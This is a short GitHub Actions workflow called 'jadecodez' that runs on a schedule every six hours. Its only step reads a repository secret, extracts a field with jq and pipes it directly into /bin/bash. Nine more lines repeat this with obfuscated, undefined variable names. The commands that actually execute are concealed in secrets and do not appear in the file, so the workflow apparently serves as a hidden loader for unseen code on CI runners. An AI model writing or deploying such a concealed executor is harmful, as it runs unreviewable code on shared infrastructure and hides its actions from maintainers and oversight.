name: jadecodez

on:
  workflow_dispatch:
  schedule:
    - cron: '30 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jadecodez
        env:
          ic3230: ${{ secrets.ic3230 }}
        run: |
          echo $ic3230 | jq -r .o180 | /bin/bash
          echo $zm30048 | jq -r .zdp1 | /bin/bash
          echo $yxe66742 | jq -r .pu8 | /bin/bash
          echo $ubgt8428 | jq -r .zdls04137 | /bin/bash
          echo $sayl63 | jq -r .x7079 | /bin/bash
          echo $pucq932 | jq -r .xy28 | /bin/bash
          echo $alups13 | jq -r .onfdz5 | /bin/bash
          echo $fyc61 | jq -r .brsl91 | /bin/bash
          echo $sevog5007 | jq -r .tdxx9207 | /bin/bash
          echo $c7 | jq -r .pxxas700 | /bin/bash

